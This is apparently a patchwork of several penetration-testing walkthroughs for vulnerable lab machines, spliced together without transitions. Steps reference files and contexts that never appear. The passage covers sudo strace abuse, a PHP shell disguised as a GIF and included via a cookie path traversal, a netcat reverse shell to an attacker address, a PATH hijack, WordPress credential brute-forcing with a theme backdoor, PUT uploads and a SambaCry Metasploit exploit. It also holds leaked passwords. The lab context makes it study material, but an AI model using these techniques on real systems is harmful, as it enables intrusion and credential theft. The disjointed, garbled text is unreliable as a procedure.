We are now logged in as peter. Let's see what we are allowed to run with sudo.
peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
strace runs as root here with no password, and since strace can launch an arbitrary program under its tracing, this entry alone is enough for a root shell.
Now we have credentials for the MySQL server. Let's try to log in. The password is passed to -p with no space, and note that it ends up in the shell history this way.
mysql -u root -h 192.168.56.101 -pH4u%QJ_H99
I got an error at first, but fixed the issue with a reboot of the VM.
Let's read the data.
show databases;
There is a Users database. Let's look at its tables and the data inside them.
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.005 sec)
Here we have three users. The pass values end in == and decode to readable text, so they are base64-encoded plaintext rather than hashes. Kent's password decodes to JWzXuBJJNy.
Let's log in as kent.
Let's try to upload a PHP shell.
The upload form only accepts images, so let's disguise the shell as one with Burp.
Change the filename to photo.gif, the Content-Type to image/gif, and put GIF87a on the first line so that a magic-byte check sees a GIF.
The location of the uploaded file shows up in the response in Burp.
Our file is uploaded, but we cannot read it back directly. We can, however, read index.php with the method used above.
In index.php, a ‘lang‘ cookie is used to include the ‘en.lang.php‘ file.
Let's try changing the cookie value to something else: if the value goes into include() unsanitised, a relative path to our upload will be included and executed as PHP.
In Firefox, open Web Developer > Storage (the Storage Inspector), select Cookies for the site, and use the + button at the top right to add a cookie.
Cookie name: lang and value: ../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif
Now reload the page.
Our file gets included, and the PHP inside it runs.
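As an added example (not code from the original walkthrough), the following Python mirrors the two checks in play above: a typical weak upload filter that the GIF87a trick satisfies, and the unsanitised include behind the lang cookie, placed next to a hardened version. The include is assumed to have the shape include("lang/" . $_COOKIE['lang']); the webroot /srv/pwnlab, the second language file and the filter's exact rules are made up for the illustration.

```python
import os

# Magic bytes a lazy "is this an image?" check looks for (assumed filter behaviour).
IMAGE_MAGICS = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
ALLOWED_EXTENSIONS = {".gif", ".jpg", ".jpeg", ".png"}
KNOWN_LANGS = {"en.lang.php", "fr.lang.php"}  # fr is a made-up second language


def build_polyglot(php_payload: bytes) -> bytes:
    """Image header first, PHP after it: the PHP engine treats the GIF87a line as text."""
    return b"GIF87a\n" + php_payload


def naive_image_check(filename: str, content_type: str, data: bytes) -> bool:
    """A typical weak upload filter: extension allowlist, client-supplied MIME type
    and magic bytes. All three are controlled by the uploader."""
    ext = os.path.splitext(filename)[1].lower()
    return (ext in ALLOWED_EXTENSIONS
            and content_type.startswith("image/")
            and data.startswith(IMAGE_MAGICS))


def include_path_vulnerable(webroot: str, lang_cookie: str) -> str:
    """What include("lang/" . $_COOKIE['lang']) resolves to with no sanitisation."""
    return os.path.normpath(os.path.join(webroot, "lang", lang_cookie))


def include_path_hardened(webroot: str, lang_cookie: str):
    """Allowlist the value, then confirm the resolved path stays under lang/.
    Returns None when the cookie is rejected."""
    if lang_cookie not in KNOWN_LANGS:
        return None
    lang_dir = os.path.realpath(os.path.join(webroot, "lang"))
    target = os.path.realpath(os.path.join(lang_dir, lang_cookie))
    if os.path.commonpath([lang_dir, target]) != lang_dir:
        return None
    return target


def demo():
    """The upload disguised as a GIF passes the filter; the traversal cookie makes the
    vulnerable include reach it, while the hardened include refuses it."""
    webroot = "/srv/pwnlab"  # made-up webroot; no file system access happens here
    shell = build_polyglot(b"<?php system($_GET['cmd']); ?>\n")
    cookie = "../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif"
    return {
        "upload_accepted": naive_image_check("photo.gif", "image/gif", shell),
        "plain_php_rejected": not naive_image_check("shell.php", "application/x-php", shell),
        "vulnerable_include": include_path_vulnerable(webroot, cookie),
        "hardened_include": include_path_hardened(webroot, cookie),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable resolver lands on /srv/pwnlab/upload/3f0d...gif, exactly the file the upload step left behind, which is why the extension never mattered: include() runs whatever PHP it finds regardless of the file name. The hardened version is the fix to aim for in a report: an allowlist of language names, and a realpath check as a second line of defence.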
Now let's get a reverse shell with netcat. With a listener already waiting on port 4444 of the attacking machine, run this command through the included shell:
nc -nv 192.168.18.99 4444 -e /bin/bash
We got a connection. (The -e option only exists in netcat builds that support executing a program; on others, fall back to another reverse-shell method.)
We now have passwords for three users. Let's examine their home directories.
Nothing special here.
Mike's password doesn't work. Let's try kane.
In kane's home there is a file owned by mike. Let's open it.
We couldn't read it. What kind of file is this?
An executable, and it is executable for us even though we can't read it. Let's try running it.
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
This executable runs cat on msg.txt in mike's home directory. Note that the error is cat's own "No such file or directory" rather than "Permission denied": cat is being run with mike's privileges (presumably the binary is SUID mike), so it can look inside a directory we cannot.
Since cat is apparently invoked by name rather than by absolute path, we can change PATH so that our own cat comes first, and it will run with the same privileges as the real one. Let's put a fake cat there that launches /bin/bash and try.
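An added example (not from the page) that simulates the PATH hijack in Python. The stand-in for msgmike runs cat by name through the shell, as a system("cat /home/mike/msg.txt") call would; that shape is an assumption, since the binary's source is not shown. The fake cat prints a marker instead of launching /bin/bash so that the demo finishes on its own.

```python
import os
import subprocess
import tempfile


def run_like_msgmike(path_env: str) -> str:
    """Stand-in for the vulnerable binary (assumed shape): it asks the shell for `cat`
    by name, so whichever cat is first in PATH is the one that runs."""
    proc = subprocess.run(
        ["sh", "-c", "cat /home/mike/msg.txt"],
        env={"PATH": path_env},
        capture_output=True, text=True,
    )
    return proc.stdout.strip()


def plant_fake_cat(directory: str) -> str:
    """Drop an executable named cat into the directory. In the real attack the body
    would be `exec /bin/bash`; here it prints a marker and the user it runs as."""
    fake = os.path.join(directory, "cat")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho \"HIJACKED: cat ran as $(id -un)\"\n")
    os.chmod(fake, 0o755)
    return fake


def demo():
    """Returns (output with the fake cat first in PATH, output with a normal PATH)."""
    with tempfile.TemporaryDirectory() as d:
        plant_fake_cat(d)
        hijacked = run_like_msgmike(d + os.pathsep + "/usr/bin:/bin")
        normal = run_like_msgmike("/usr/bin:/bin")  # real cat: error on stderr, empty stdout
    return hijacked, normal


if __name__ == "__main__":
    print(demo())
```

On the target the same idea is a one-liner: a /tmp/cat script that execs /bin/bash, then export PATH=/tmp:$PATH before running ./msgmike. Two things decide whether it works: the binary must call cat without an absolute path, and if it only raises the effective UID, bash will drop it again on start-up unless started with -p.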
There is a web server running on port 80. Let's have a look.
Let's do a directory scan with Gobuster.
root@kali:~# gobuster dir -u 192.168.18.96 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
We find wp-content, wp-admin and wp-login on the server, so this is a WordPress installation.
Before going further, let's have a look at robots.txt.
The robots.txt disallows fsocity.dic and key-1-of-3.txt, which is exactly why those two are worth fetching.
fsocity.dic is a wordlist. Let's save it so we can use it for fuzzing later.
This is key-1-of-3, so two more keys remain.
Now we need a username and password. Go to the login page and try the usual combinations.
Next, let's find valid usernames from the .dic file with Burp Suite.
Capture the login request and send it to Intruder.
Click Clear and mark the username field as the payload position.
The wordlist has a lot of repeated lines, so first remove the duplicates:
sort fsocity.dic | uniq > test.txt
The original file is 6 MB and the deduplicated one just 94 KB. Use this file as the payload list in Burp.
Load the file and start the attack. Burp Community throttles Intruder, so the attack is faster in the paid version.
The usual response length is 4145 when the username is wrong. For the username elliot the response length is 4196: WordPress answers "Invalid username" for unknown users but a different, longer error for a valid user with a wrong password, which is what makes user enumeration possible here. Let's try that in the browser.
The username elliot is right. Now we need to find the password with the same method.
Take the login request again, send it to Intruder, and use the same file for fuzzing, this time on the password field.
We got the password too: ER28-0652.
And we're logged in.
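An added example (not part of the original walkthrough) of the logic behind the two Intruder runs: deduplicating the wordlist, spotting the odd response length out, and confirming the hit by the WordPress error text rather than by length alone. The response bodies and lengths below are constructed to look like the page's numbers; they are not a real Burp export.

```python
import re
from collections import Counter


def dedupe_wordlist(lines):
    """What `sort fsocity.dic | uniq` achieves: every candidate once. Order is kept
    here, which sort | uniq does not preserve, but the set of words is identical."""
    seen, out = set(), []
    for line in lines:
        word = line.strip()
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def find_outliers(results):
    """results: (candidate, response_length) pairs from a brute-force run.
    The most common length is the 'wrong guess' page; anything else deserves a look."""
    baseline = Counter(length for _, length in results).most_common(1)[0][0]
    return baseline, [(c, n) for c, n in results if n != baseline]


def classify_wp_login(status, body):
    """Classify a wp-login.php response. A 302 is a successful login; otherwise the
    error text separates unknown users from wrong passwords (WordPress 4.x wording)."""
    if status == 302:
        return "logged_in"
    if "Invalid username" in body:
        return "unknown_user"
    if re.search(r"password you entered for the username .* is incorrect", body):
        return "valid_user"
    return "unknown"


# Constructed samples: unknown names get the 4145-byte "Invalid username" page,
# the valid user gets the longer "incorrect password" page.
SAMPLE_WORDLIST = ["true\n", "false\n", "wikia\n", "from\n", "true\n", "elliot\n", "from\n"]
SAMPLE_RESULTS = [("true", 4145), ("false", 4145), ("wikia", 4145),
                  ("from", 4145), ("elliot", 4196)]
BODY_UNKNOWN = '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
BODY_VALID = ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
              'for the username <strong>elliot</strong> is incorrect.</div>')


def demo():
    words = dedupe_wordlist(SAMPLE_WORDLIST)
    baseline, hits = find_outliers(SAMPLE_RESULTS)
    verdicts = {c: classify_wp_login(200, BODY_VALID if c == "elliot" else BODY_UNKNOWN)
                for c, _ in SAMPLE_RESULTS}
    return words, baseline, hits, verdicts


if __name__ == "__main__":
    print(demo())
```

Length is a quick filter, but the error string is the reliable signal: the response size of a real page shifts with nonces and cookies, so always confirm a length outlier by reading the body, as the walkthrough does when it tries elliot in the browser.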
Now we need a reverse shell. Let's get one by editing a theme template.
Visit the following page and select the 404 Template.
http://192.168.18.96/wp-admin/theme-editor.php
This template is rendered whenever this WordPress installation serves a 404 error. If we add our backdoor script to it and then request a non-existent page, we get a reverse shell. Paste the contents of the following file there, with a listener already running on the attacking machine.
Set the attack type to ‘pitchfork‘ and make sure the email and password fields are both selected as positions.
Now go to Payloads and load the list we downloaded earlier into both the first and second payload sets.
Click Start Attack.
As the attack runs, notice that some responses are 231 bytes long and some 1838. The 1838-byte ones are the ones we want: successful logins.
Here, let's try '-' as both the email and the password.
And we're in!
We have SSH credentials now. Let's try logging in.
The connection does not go through directly. But remember, there is a Squid proxy open on port 3128.
Let's try connecting through it.
Add the following line to /etc/proxychains.conf. Squid is an HTTP proxy, so the type is http; proxychains will tunnel the SSH connection through an HTTP CONNECT request, which only works if Squid's ACLs allow CONNECT to port 22 (a default squid.conf only allows it to 443).
http 192.168.18.94 3128
Now let's try connecting to the machine through proxychains.
We log in to the server but get logged out immediately, so let's pass a command to ssh to run on login instead of the default shell.
root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.28:
| CVE-2013-4559 7.6 https://vulners.com/cve/CVE-2013-4559
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2013-4508 5.8 https://vulners.com/cve/CVE-2013-4508
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
| CVE-2011-4362 5.0 https://vulners.com/cve/CVE-2011-4362
|_ CVE-2013-4560 2.6 https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.04 ms 192.168.18.90
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds
There is nothing interesting in index.php,
but there is a /test page.
Let's use curl to check which HTTP methods are allowed there.
curl -v -X OPTIONS http://192.168.18.90/test
PUT is allowed. On lighttpd that usually means mod_webdav is enabled for /test and not set to read-only, so we can write files straight into that directory. Let's try uploading a PHP shell there; it will only execute if lighttpd hands .php files in /test to its PHP handler, otherwise we just get the source back.
Let's run an extended scan to enumerate services and versions, with Nmap's basic vulnerability scripts.
root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open domain dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:thekelleys:dnsmasq:2.75:
| CVE-2019-14513 5.0 https://vulners.com/cve/CVE-2019-14513
|_ CVE-2019-14834 4.3 https://vulners.com/cve/CVE-2019-14834
80/tcp open http PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.18.85
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds
Nothing interesting turned up from the port 80 web page or the nikto and gobuster scans.
Samba is running on port 139. Let's try to exploit it before moving on to FTP. The is_known_pipename module targets CVE-2017-7494 (SambaCry), which needs a share we can write to and a guessable server-side path for the uploaded shared object.
msfconsole
msf5 > use exploit/linux/samba/is_known_pipename